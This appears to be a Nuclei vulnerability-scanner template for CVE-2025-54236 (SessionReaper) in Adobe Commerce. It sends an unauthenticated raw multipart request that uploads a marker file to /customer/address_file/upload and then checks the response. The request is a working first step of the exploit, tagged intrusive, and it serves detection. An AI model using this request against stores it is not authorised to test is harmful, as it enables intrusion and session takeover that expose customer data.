id: CVE-2025-54236

info:
  name: Adobe Commerce - Authentication Bypass
  author: DhiyaneshDK,slcyber,johnk3r
  severity: critical
  description: |
    Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue does not require user interaction.
  impact: |
    Attackers can take over user sessions, compromising confidentiality and integrity of user data.
  remediation: |
    Update to the latest Adobe Commerce version.
  reference:
    - https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/?v=2
    - https://sansec.io/research/sessionreaper
  metadata:
    verified: true
    max-request: 1
    shodan-query: "X-Magento-Tags"
  tags: cve,cve2025,file-upload,intrusive,auth-bypass,kev,vkev

variables:
  form_key: "{{rand_text_alphanumeric(16)}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{randstr}}"
  base64: "{{base64(filename)}}"

http:
  - raw:
      - |
        POST /customer/address_file/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Cookie: form_key={{form_key}}

        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="custom_attributes[country_id]"; filename="{{filename}}"
        Content-Type: text/plain

        {{marker}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ--

        {
          "name": "{{filename}}",
          "full_path": "{{filename}}",
          "type": "text/plain",
          "tmp_name": "{{filename}}",
          "error": 0,
          "size": 11,
          "file": "/t/e/{{filename}}",
          "url": "{{RootURL}}/customer/address/viewfile/file/{{base64}}~~/"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "full_path","tmp_name","size","{{base64}}" )'
        condition: and
# digest: 4a0a0047304502203b0116b3e0f9f6686273970a19f4429bbf3b6041026bdcff884e7b565c5e03e3022100ebbe2fac2e525f8e44f000f4c8dd3d9ffa8da86c7e51b4d41ab4b80b2d6939ae:922c64590222798bb761d5b6d8e72950